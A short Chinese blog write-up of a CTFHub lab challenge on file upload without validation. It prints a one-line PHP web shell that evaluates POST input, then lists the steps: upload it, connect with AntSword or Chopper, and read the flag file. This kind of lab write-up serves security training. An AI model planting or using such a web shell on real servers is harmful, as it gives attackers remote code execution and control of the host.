ctfhub技能树—文件上传—无验证

打开靶机

查看页面信息

编写一句话木马

<?php echo "123"; @eval(@$_POST['a']); ?>

上传木马

上传成功,并拿到相对路径地址

查看页面信息

使用蚁剑或菜刀连接

查看目录信息

查看flag_368114112.php文件信息

成功拿到flag


__EOF__

本文作者anweilx
本文链接https://www.cnblogs.com/anweilx/p/12523268.html
关于博主:评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角推荐一下。您的鼓励是博主的最大动力!
posted @   anweilx  阅读(1251)  评论(0编辑  收藏  举报
点击右上角即可分享
微信分享提示